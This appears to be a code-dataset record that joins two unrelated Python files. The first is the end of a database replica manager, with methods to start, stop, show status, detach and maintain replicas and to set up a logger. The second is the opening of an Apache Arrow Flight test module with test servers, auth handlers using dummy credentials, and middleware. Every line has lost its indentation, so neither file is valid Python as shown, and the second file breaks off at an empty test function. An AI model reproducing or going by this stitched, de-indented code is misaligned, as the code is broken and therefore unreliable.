run_maintenance = self.pg_engine.check_auto_maintenance()
self.pg_engine.disconnect_db()
if run_maintenance:
self.pg_engine.run_maintenance()
self.logger.info("Replica process for source %s ended" % (self.args.source))
def start_replica(self):
"""
The method starts a new replica process.
Is compulsory to specify a source name when running this method.
"""
replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
if self.args.source == "*":
print("You must specify a source name using the argument --source")
else:
self.pg_engine.connect_db()
self.logger.info("Checking if the replica for source %s is stopped " % (self.args.source))
replica_status = self.pg_engine.get_replica_status()
if replica_status in ['syncing', 'running', 'initialising']:
print("The replica process is already started or is syncing. Aborting the command.")
elif replica_status == 'error':
print("The replica process is in error state.")
print("You may need to check the replica status first. To enable it run the following command.")
print("chameleon.py enable_replica --config %s --source %s " % (self.args.config, self.args.source))
else:
self.logger.info("Cleaning not processed batches for source %s" % (self.args.source))
self.pg_engine.clean_not_processed_batches()
self.pg_engine.disconnect_db()
if self.args.debug:
self.__run_replica()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Starting the replica process for source %s" % (self.args.source))
keep_fds = [self.logger_fds]
app_name = "%s_replica" % self.args.source
replica_daemon = Daemonize(app=app_name, pid=replica_pid, action=self.__run_replica, foreground=foreground , keep_fds=keep_fds)
try:
replica_daemon.start()
except:
print("The replica process is already started. Aborting the command.")
def __stop_replica(self):
"""
The method reads the pid of the replica process for the given self.source and sends a SIGINT which
tells the replica process to manage a graceful exit.
"""
replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.source))
if os.path.isfile(replica_pid):
try:
file_pid=open(replica_pid,'r')
pid=file_pid.read()
file_pid.close()
os.kill(int(pid),2)
print("Requesting the replica for source %s to stop" % (self.source))
while True:
try:
os.kill(int(pid),0)
except:
break
print("The replica process is stopped")
except:
print("An error occurred when trying to signal the replica process")
def __set_conf_permissions(self, cham_dir):
"""
The method sets the permissions of the configuration directory to 700
:param cham_dir: the chameleon configuration directory to fix
"""
if os.path.isdir(cham_dir):
os.chmod(cham_dir, 0o700)
def stop_replica(self):
"""
The method calls the private method __stop_replica to stop the replica process.
"""
self.__stop_replica()
def stop_all_replicas(self):
"""
The method stops all the active replicas within the target database
"""
self.__stop_all_active_sources()
def show_errors(self):
"""
displays the error log entries if any.
If the source the error log is filtered for this source only.
"""
log_id = self.args.logid
self.pg_engine.source = self.args.source
log_error_data = self.pg_engine.get_log_data(log_id)
if log_error_data:
if log_id != "*":
tab_body = []
log_line = log_error_data[0]
tab_body.append(['Log id', log_line[0]])
tab_body.append(['Source name', log_line[1]])
tab_body.append(['ID Batch', log_line[2]])
tab_body.append(['Table', log_line[3]])
tab_body.append(['Schema', log_line[4]])
tab_body.append(['Error timestamp', log_line[5]])
tab_body.append(['SQL executed', log_line[6]])
tab_body.append(['Error message', log_line[7]])
print(tabulate(tab_body, tablefmt="simple"))
else:
tab_headers = ['Log id', 'Source name', 'ID Batch', 'Table', 'Schema' , 'Error timestamp']
tab_body = []
for log_line in log_error_data:
log_id = log_line[0]
id_batch = log_line[1]
source_name = log_line[2]
table_name = log_line[3]
schema_name = log_line[4]
error_timestamp = log_line[5]
tab_row = [log_id, id_batch,source_name, table_name, schema_name, error_timestamp]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers, tablefmt="simple"))
else:
print('There are no errors in the log')
def show_status(self):
"""
list the replica status from the replica catalogue.
If the source is specified gives some extra details on the source status.
"""
self.pg_engine.auto_maintenance = "disabled"
if self.args.source != "*":
if "auto_maintenance" in self.config["sources"][self.args.source]:
self.pg_engine.auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"]
self.pg_engine.source = self.args.source
configuration_data = self.pg_engine.get_status()
configuration_status = configuration_data[0]
schema_mappings = configuration_data[1]
table_status = configuration_data[2]
replica_counters = configuration_data[3]
tab_headers = ['Source id', 'Source name', 'Type', 'Status', 'Consistent' , 'Read lag', 'Last read', 'Replay lag' , 'Last replay']
tab_body = []
for status in configuration_status:
source_id = status[0]
source_name = status[1]
source_status = status[2]
read_lag = status[3]
last_read = status[4]
replay_lag = status[5]
last_replay = status[6]
consistent = status[7]
source_type = status[8]
last_maintenance = status[9]
next_maintenance = status[10]
tab_row = [source_id, source_name, source_type, source_status, consistent, read_lag, last_read, replay_lag, last_replay]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers, tablefmt="simple"))
if schema_mappings:
print('\n== Schema mappings ==')
tab_headers = ['Origin schema', 'Destination schema']
tab_body = []
for mapping in schema_mappings:
origin_schema = mapping[0]
destination_schema= mapping[1]
tab_row = [origin_schema, destination_schema]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers, tablefmt="simple"))
if table_status:
print('\n== Replica status ==')
#tab_headers = ['', '', '']
tab_body = []
tables_no_replica = table_status[0]
tab_row = ['Tables not replicated', tables_no_replica[1]]
tab_body.append(tab_row)
tables_with_replica = table_status[1]
tab_row = ['Tables replicated', tables_with_replica[1]]
tab_body.append(tab_row)
tables_all= table_status[2]
tab_row = ['All tables', tables_all[1]]
tab_body.append(tab_row)
tab_row = ['Last maintenance', last_maintenance]
tab_body.append(tab_row)
tab_row = ['Next maintenance', next_maintenance]
tab_body.append(tab_row)
if replica_counters:
tab_row = ['Replayed rows', replica_counters[0]]
tab_body.append(tab_row)
tab_row = ['Replayed DDL', replica_counters[2]]
tab_body.append(tab_row)
tab_row = ['Skipped rows', replica_counters[1]]
tab_body.append(tab_row)
print(tabulate(tab_body, tablefmt="simple"))
if tables_no_replica[2]:
print('\n== Tables with replica disabled ==')
print("\n".join(tables_no_replica[2]))
def detach_replica(self):
"""
The method terminates the replica process. The source is removed from the table t_sources with all the associated data.
The schema sequences in are reset to the max values in the corresponding tables, leaving
the postgresql database as a standalone snapshot.
The method creates the foreign keys existing in MySQL as well.
Is compulsory to specify a source name when running this method.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
elif self.args.tables != "*":
print("You cannot specify a table name when running detach_replica.")
else:
drp_msg = 'Detaching the replica will remove any reference for the source %s.\n Are you sure? YES/No\n' % self.args.source
drop_src = input(drp_msg)
if drop_src == 'YES':
if "keep_existing_schema" in self.config["sources"][self.args.source]:
keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"]
else:
keep_existing_schema = False
self.pg_engine.keep_existing_schema = keep_existing_schema
if not keep_existing_schema:
self.pg_engine.fk_metadata = self.mysql_source.get_foreign_keys_metadata()
self.__stop_replica()
self.pg_engine.detach_replica()
elif drop_src in self.lst_yes:
print('Please type YES all uppercase to confirm')
def run_maintenance(self):
"""
The method runs a maintenance process on the target postgresql database specified in the given source.
"""
maintenance_pid = os.path.expanduser('%s/%s_maintenance.pid' % (self.config["pid_dir"],self.args.source))
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
if self.args.debug:
self.pg_engine.run_maintenance()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
self.logger.info("Starting the maintenance on the source %s" % (self.args.source, ))
foreground = False
print("Starting the maintenance process for source %s" % (self.args.source))
keep_fds = [self.logger_fds]
app_name = "%s_maintenance" % self.args.source
maintenance_daemon = Daemonize(app=app_name, pid=maintenance_pid, action=self.pg_engine.run_maintenance, foreground=foreground , keep_fds=keep_fds)
try:
maintenance_daemon.start()
except:
print("The maintenance process is already started. Aborting the command.")
def __init_logger(self, logger_name):
"""
The method initialise a new logger object using the configuration parameters.
The formatter is different if the debug option is enabler or not.
The method returns a new logger object and sets the logger's file descriptor in the class variable
logger_fds, used when the process is demonised.
:param logger_name: the name of the logger used to build the file name and get the correct logger
:return: list with logger and file descriptor
:rtype: list
"""
log_dir = self.config["log_dir"]
log_level = self.config["log_level"]
log_dest = self.config["log_dest"]
log_days_keep = self.config["log_days_keep"]
log_level_map = {
"debug": logging.DEBUG,
"info": logging.INFO,
"warning": logging.WARNING,
"error": logging.ERROR,
"critical": logging.CRITICAL
}
config_name = self.args.config
source_name = self.args.source
debug_mode = self.args.debug
if source_name == '*':
log_name = "%s_general" % (config_name)
elif logger_name == "global":
log_name = "%s_%s" % (config_name, source_name)
else:
log_name = "%s_%s_%s" % (config_name, source_name, logger_name)
log_file = os.path.expanduser('%s/%s.log' % (log_dir,log_name))
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG)
logger.propagate = False
if debug_mode:
str_format = "%(asctime)s %(processName)s %(levelname)s %(filename)s (%(lineno)s): %(message)s"
else:
str_format = "%(asctime)s %(processName)s %(levelname)s: %(message)s"
formatter = logging.Formatter(str_format, "%Y-%m-%d %H:%M:%S")
if log_dest=='stdout' or debug_mode:
fh=logging.StreamHandler(sys.stdout)
elif log_dest=='file':
fh = TimedRotatingFileHandler(log_file, when="d",interval=1,backupCount=log_days_keep)
else:
print("Invalid log_dest value: %s" % log_dest)
sys.exit()
if debug_mode:
log_level = 'debug'
fh.setLevel(log_level_map.get(log_level, logging.DEBUG))
fh.setFormatter(formatter)
logger.addHandler(fh)
logger_fds = fh.stream.fileno()
return [logger, logger_fds]
|
test_flight.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ast
import base64
import itertools
import os
import signal
import struct
import tempfile
import threading
import time
import traceback
import numpy as np
import pytest
import pyarrow as pa
from pyarrow.lib import tobytes
from pyarrow.util import pathlib, find_free_port
from pyarrow.tests import util
try:
from pyarrow import flight
from pyarrow.flight import (
FlightClient, FlightServerBase,
ServerAuthHandler, ClientAuthHandler,
ServerMiddleware, ServerMiddlewareFactory,
ClientMiddleware, ClientMiddlewareFactory,
)
except ImportError:
flight = None
FlightClient, FlightServerBase = object, object
ServerAuthHandler, ClientAuthHandler = object, object
ServerMiddleware, ServerMiddlewareFactory = object, object
ClientMiddleware, ClientMiddlewareFactory = object, object
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight
def test_import():
# So we see the ImportError somewhere
import pyarrow.flight # noqa
def resource_root():
"""Get the path to the test resources directory."""
if not os.environ.get("ARROW_TEST_DATA"):
raise RuntimeError("Test resources not found; set "
"ARROW_TEST_DATA to <repo root>/testing/data")
return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"
def read_flight_resource(path):
"""Get the contents of a test resource file."""
root = resource_root()
if not root:
return None
try:
with (root / path).open("rb") as f:
return f.read()
except FileNotFoundError:
raise RuntimeError(
"Test resource {} not found; did you initialize the "
"test resource submodule?\n{}".format(root / path,
traceback.format_exc()))
def example_tls_certs():
"""Get the paths to test TLS certificates."""
return {
"root_cert": read_flight_resource("root-ca.pem"),
"certificates": [
flight.CertKeyPair(
cert=read_flight_resource("cert0.pem"),
key=read_flight_resource("cert0.key"),
),
flight.CertKeyPair(
cert=read_flight_resource("cert1.pem"),
key=read_flight_resource("cert1.key"),
),
]
}
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)
])
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
CRITERIA = b"the expected criteria"
def __init__(self, location=None, options=None, **kwargs):
super().__init__(location, **kwargs)
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
self.options = options
def list_flights(self, context, criteria):
if criteria == self.CRITERIA:
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table, options=self.options)
class MetadataFlightServer(FlightServerBase):
"""A Flight server that numbers incoming/outgoing data."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_get(self, context, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.GeneratorStream(
table.schema,
self.number_batches(table),
options=self.options)
def do_put(self, context, descriptor, reader, writer):
counter = 0
expected_data = [-10, -5, 0, 5, 10]
while True:
try:
batch, buf = reader.read_chunk()
assert batch.equals(pa.RecordBatch.from_arrays(
[pa.array([expected_data[counter]])],
['a']
))
assert buf is not None
client_counter, = struct.unpack('<i', buf.to_pybytes())
assert counter == client_counter
writer.write(struct.pack('<i', counter))
counter += 1
except StopIteration:
return
@staticmethod
def number_batches(table):
for idx, batch in enumerate(table.to_batches()):
buf = struct.pack('<i', idx)
yield batch, buf
class EchoFlightServer(FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self, location=None, expected_schema=None, **kwargs):
super().__init__(location, **kwargs)
self.last_message = None
self.expected_schema = expected_schema
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader, writer):
if self.expected_schema:
assert self.expected_schema == reader.schema
self.last_message = reader.read_all()
def do_exchange(self, context, descriptor, reader, writer):
for chunk in reader:
pass
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(max_chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return [context.peer_identity(), context.peer().encode("utf-8")]
raise NotImplementedError
class GetInfoFlightServer(FlightServerBase):
"""A Flight server that tests GetFlightInfo."""
def get_flight_info(self, context, descriptor):
return flight.FlightInfo(
pa.schema([('a', pa.int32())]),
descriptor,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
def get_schema(self, context, descriptor):
info = self.get_flight_info(context, descriptor)
return flight.SchemaResult(info.schema)
class ListActionsFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
@classmethod
def expected_actions(cls):
return [
("action-1", "description"),
("action-2", ""),
flight.ActionType("action-3", "more detail"),
]
def list_actions(self, context):
yield from self.expected_actions()
class ListActionsErrorFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
def list_actions(self, context):
yield ("action-1", "")
yield "foo"
class CheckTicketFlightServer(FlightServerBase):
"""A Flight server that compares the given ticket to an expected value."""
def __init__(self, expected_ticket, location=None, **kwargs):
super().__init__(location, **kwargs)
self.expected_ticket = expected_ticket
def do_get(self, context, ticket):
assert self.expected_ticket == ticket.ticket
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
return flight.RecordBatchStream(table)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class InvalidStreamFlightServer(FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
assert data1.type != data2.type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class NeverSendsDataFlightServer(FlightServerBase):
"""A Flight server that never actually yields data."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
if ticket.ticket == b'yield_data':
# Check that the server handler will ignore empty tables
# up to a certain extent
data = [
self.schema.empty_table(),
self.schema.empty_table(),
pa.RecordBatch.from_arrays([range(5)], schema=self.schema),
]
return flight.GeneratorStream(self.schema, data)
return flight.GeneratorStream(
self.schema, itertools.repeat(self.schema.empty_table()))
class SlowFlightServer(FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_get(self, context, ticket):
return flight.GeneratorStream(pa.schema([('a', pa.int32())]),
self.slow_stream())
def do_action(self, context, action):
time.sleep(0.5)
return []
@staticmethod
def slow_stream():
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
yield pa.Table.from_arrays(data1, names=['a'])
# The second message should never get sent; the client should
# cancel before we send this
time.sleep(10)
yield pa.Table.from_arrays(data1, names=['a'])
class ErrorFlightServer(FlightServerBase):
"""A Flight server that uses all the Flight-specific errors."""
def do_action(self, context, action):
if action.type == "internal":
raise flight.FlightInternalError("foo")
elif action.type == "timedout":
raise flight.FlightTimedOutError("foo")
elif action.type == "cancel":
raise flight.FlightCancelledError("foo")
elif action.type == "unauthenticated":
raise flight.FlightUnauthenticatedError("foo")
elif action.type == "unauthorized":
raise flight.FlightUnauthorizedError("foo")
elif action.type == "protobuf":
err_msg = b'this is an error message'
raise flight.FlightUnauthorizedError("foo", err_msg)
raise NotImplementedError
def list_flights(self, context, criteria):
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
raise flight.FlightInternalError("foo")
class ExchangeFlightServer(FlightServerBase):
"""A server for testing DoExchange."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_exchange(self, context, descriptor, reader, writer):
if descriptor.descriptor_type != flight.DescriptorType.CMD:
raise pa.ArrowInvalid("Must provide a command descriptor")
elif descriptor.command == b"echo":
return self.exchange_echo(context, reader, writer)
elif descriptor.command == b"get":
return self.exchange_do_get(context, reader, writer)
elif descriptor.command == b"put":
return self.exchange_do_put(context, reader, writer)
elif descriptor.command == b"transform":
return self.exchange_transform(context, reader, writer)
else:
raise pa.ArrowInvalid(
"Unknown command: {}".format(descriptor.command))
def exchange_do_get(self, context, reader, writer):
"""Emulate DoGet with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
writer.begin(data.schema)
writer.write_table(data)
def exchange_do_put(self, context, reader, writer):
"""Emulate DoPut with DoExchange."""
num_batches = 0
for chunk in reader:
if not chunk.data:
raise pa.ArrowInvalid("All chunks must have data.")
num_batches += 1
writer.write_metadata(str(num_batches).encode("utf-8"))
def exchange_echo(self, context, reader, writer):
"""Run a simple echo server."""
started = False
for chunk in reader:
if not started and chunk.data:
writer.begin(chunk.data.schema, options=self.options)
started = True
if chunk.app_metadata and chunk.data:
writer.write_with_metadata(chunk.data, chunk.app_metadata)
elif chunk.app_metadata:
writer.write_metadata(chunk.app_metadata)
elif chunk.data:
writer.write_batch(chunk.data)
else:
assert False, "Should not happen"
def exchange_transform(self, context, reader, writer):
"""Sum rows in an uploaded table."""
for field in reader.schema:
if not pa.types.is_integer(field.type):
raise pa.ArrowInvalid("Invalid field: " + repr(field))
table = reader.read_all()
sums = [0] * table.num_rows
for column in table:
for row, value in enumerate(column):
sums[row] += value.as_py()
result = pa.Table.from_arrays([pa.array(sums)], names=["sum"])
writer.begin(result.schema)
writer.write_table(result)
class HttpBasicServerAuthHandler(ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
buf = incoming.read()
auth = flight.BasicAuth.deserialize(buf)
if auth.username not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
if self.creds[auth.username] != auth.password:
raise flight.FlightUnauthenticatedError("wrong password")
outgoing.write(tobytes(auth.username))
def is_valid(self, token):
if not token:
raise flight.FlightUnauthenticatedError("token not provided")
if token not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
return token
class HttpBasicClientAuthHandler(ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super().__init__()
self.basic_auth = flight.BasicAuth(username, password)
self.token = None
def authenticate(self, outgoing, incoming):
auth = self.basic_auth.serialize()
outgoing.write(auth)
self.token = incoming.read()
def get_token(self):
return self.token
class TokenServerAuthHandler(ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise flight.FlightUnauthenticatedError(
"invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise flight.FlightUnauthenticatedError("invalid token")
return token[7:]
class TokenClientAuthHandler(ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super().__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
class NoopAuthHandler(ServerAuthHandler):
"""A no-op auth handler."""
def authenticate(self, outgoing, incoming):
"""Do nothing."""
def is_valid(self, token):
"""
Returning an empty string.
Returning None causes Type error.
"""
return ""
def case_insensitive_header_lookup(headers, lookup_key):
"""Lookup the value of given key in the given headers.
The key lookup is case insensitive.
"""
for key in headers:
if key.lower() == lookup_key.lower():
return headers.get(key)
class ClientHeaderAuthMiddlewareFactory(ClientMiddlewareFactory):
"""ClientMiddlewareFactory that creates ClientAuthHeaderMiddleware."""
def __init__(self):
self.call_credential = []
def start_call(self, info):
return ClientHeaderAuthMiddleware(self)
def set_call_credential(self, call_credential):
self.call_credential = call_credential
class ClientHeaderAuthMiddleware(ClientMiddleware):
"""
ClientMiddleware that extracts the authorization header
from the server.
This is an example of a ClientMiddleware that can extract
the bearer token authorization header from a HTTP header
authentication enabled server.
Parameters
----------
factory : ClientHeaderAuthMiddlewareFactory
This factory is used to set call credentials if an
authorization header is found in the headers from the server.
"""
def __init__(self, factory):
self.factory = factory
def received_headers(self, headers):
auth_header = case_insensitive_header_lookup(headers, 'Authorization')
self.factory.set_call_credential([
b'authorization',
auth_header[0].encode("utf-8")])
class HeaderAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Validates incoming username and password."""
def start_call(self, info, headers):
auth_header = case_insensitive_header_lookup(
headers,
'Authorization'
)
values = auth_header[0].split(' ')
token = ''
error_message = 'Invalid credentials'
if values[0] == 'Basic':
decoded = base64.b64decode(values[1])
pair = decoded.decode("utf-8").split(':')
if not (pair[0] == 'test' and pair[1] == 'password'):
raise flight.FlightUnauthenticatedError(error_message)
token = 'token1234'
elif values[0] == 'Bearer':
token = values[1]
if not token == 'token1234':
raise flight.FlightUnauthenticatedError(error_message)
else:
raise flight.FlightUnauthenticatedError(error_message)
return HeaderAuthServerMiddleware(token)
class HeaderAuthServerMiddleware(ServerMiddleware):
"""A ServerMiddleware that transports incoming username and passowrd."""
def __init__(self, token):
self.token = token
def sending_headers(self):
return {'authorization': 'Bearer ' + self.token}
class HeaderAuthFlightServer(FlightServerBase):
"""A Flight server that tests with basic token authentication. """
def do_action(self, context, action):
middleware = context.get_middleware("auth")
if middleware:
auth_header = case_insensitive_header_lookup(
middleware.sending_headers(), 'Authorization')
values = auth_header.split(' ')
return [values[1].encode("utf-8")]
raise flight.FlightUnauthenticatedError(
'No token auth middleware found.')
class ArbitraryHeadersServerMiddlewareFactory(ServerMiddlewareFactory):
"""A ServerMiddlewareFactory that transports arbitrary headers."""
def start_call(self, info, headers):
return ArbitraryHeadersServerMiddleware(headers)
class ArbitraryHeadersServerMiddleware(ServerMiddleware):
"""A ServerMiddleware that transports arbitrary headers."""
def __init__(self, incoming):
self.incoming = incoming
def sending_headers(self):
return self.incoming
class ArbitraryHeadersFlightServer(FlightServerBase):
"""A Flight server that tests multiple arbitrary headers."""
def do_action(self, context, action):
middleware = context.get_middleware("arbitrary-headers")
if middleware:
headers = middleware.sending_headers()
header_1 = case_insensitive_header_lookup(
headers,
'test-header-1'
)
header_2 = case_insensitive_header_lookup(
headers,
'test-header-2'
)
value1 = header_1[0].encode("utf-8")
value2 = header_2[0].encode("utf-8")
return [value1, value2]
raise flight.FlightServerError("No headers middleware found")
class HeaderServerMiddleware(ServerMiddleware):
"""Expose a per-call value to the RPC method body."""
def __init__(self, special_value):
self.special_value = special_value
class HeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Expose a per-call hard-coded value to the RPC method body."""
def start_call(self, info, headers):
return HeaderServerMiddleware("right value")
class HeaderFlightServer(FlightServerBase):
"""Echo back the per-call hard-coded value."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
if middleware:
return [middleware.special_value.encode()]
return [b""]
class MultiHeaderFlightServer(FlightServerBase):
"""Test sending/receiving multiple (binary-valued) headers."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
headers = repr(middleware.client_headers).encode("utf-8")
return [headers]
class SelectiveAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Deny access to certain methods based on a header."""
def start_call(self, info, headers):
if info.method == flight.FlightMethod.LIST_ACTIONS:
# No auth needed
return
token = headers.get("x-auth-token")
if not token:
raise flight.FlightUnauthenticatedError("No token")
token = token[0]
if token != "password":
raise flight.FlightUnauthenticatedError("Invalid token")
return HeaderServerMiddleware(token)
class SelectiveAuthClientMiddlewareFactory(ClientMiddlewareFactory):
def start_call(self, info):
return SelectiveAuthClientMiddleware()
class SelectiveAuthClientMiddleware(ClientMiddleware):
def sending_headers(self):
return {
"x-auth-token": "password",
}
class RecordingServerMiddlewareFactory(ServerMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info, headers):
self.methods.append(info.method)
return None
class RecordingClientMiddlewareFactory(ClientMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info):
self.methods.append(info.method)
return None
class MultiHeaderClientMiddlewareFactory(ClientMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self):
# Read in test_middleware_multi_header below.
# The middleware instance will update this value.
self.last_headers = {}
def start_call(self, info):
return MultiHeaderClientMiddleware(self)
class MultiHeaderClientMiddleware(ClientMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
EXPECTED = {
"x-text": ["foo", "bar"],
"x-binary-bin": [b"\x00", b"\x01"],
}
def __init__(self, factory):
self.factory = factory
def sending_headers(self):
return self.EXPECTED
def received_headers(self, headers):
# Let the test code know what the last set of headers we
# received were.
self.factory.last_headers = headers
class MultiHeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def start_call(self, info, headers):
return MultiHeaderServerMiddleware(headers)
class MultiHeaderServerMiddleware(ServerMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self, client_headers):
self.client_headers = client_headers
def sending_headers(self):
return MultiHeaderClientMiddleware.EXPECTED
class LargeMetadataFlightServer(FlightServerBase):
"""Regression test for ARROW-13253."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata = b' ' * (2 ** 31 + 1)
def do_get(self, context, ticket):
schema = pa.schema([('a', pa.int64())])
return flight.GeneratorStream(schema, [
(pa.record_batch([[1]], schema=schema), self._metadata),
])
def do_exchange(self, context, descriptor, reader, writer):
writer.write_metadata(self._metadata)
def test_flight_server_location_argument():
locations = [
None,
'grpc://localhost:0',
('localhost', find_free_port()),
]
for location in locations:
with FlightServerBase(location) as server:
assert isinstance(server, FlightServerBase)
def test_server_exit_reraises_exception():
with pytest.raises(ValueError):
with FlightServerBase():
raise ValueError()
@pytest.mark.slow
def test_client_wait_for_available():
location = ('localhost', find_free_port())
server = None
def serve():
global server
time.sleep(0.5)
server = FlightServerBase(location)
server.serve()
client = FlightClient(location)
thread = threading.Thread(target=serve, daemon=True)
thread.start()
started = time.time()
client.wait_for_available(timeout=5)
elapsed = time.time() - started
assert elapsed >= 0.5
def test_flight_list_flights():
"""Try a simple list_flights call."""
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
assert list(client.list_flights()) == []
flights = client.list_flights(ConstantFlightServer.CRITERIA)
assert len(list(flights)) == 1
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ConstantFlightServer(options=options) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
# Also test via RecordBatchReader interface
data = client.do_get(flight.Ticket(b'ints')).to_reader().read_all()
assert data.equals(table)
with pytest.raises(flight.FlightServerError,
match="expected IpcWriteOptions, got <class 'int'>"):
with ConstantFlightServer(options=42) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.pandas
def test_do_get_ints_pandas():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_pandas()
assert list(data['some_ints']) == table.column(0).to_pylist()
def test_flight_do_get_dicts():
table = simple_dicts_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
def test_flight_do_get_ticket():
"""Make sure Tickets get passed to the server."""
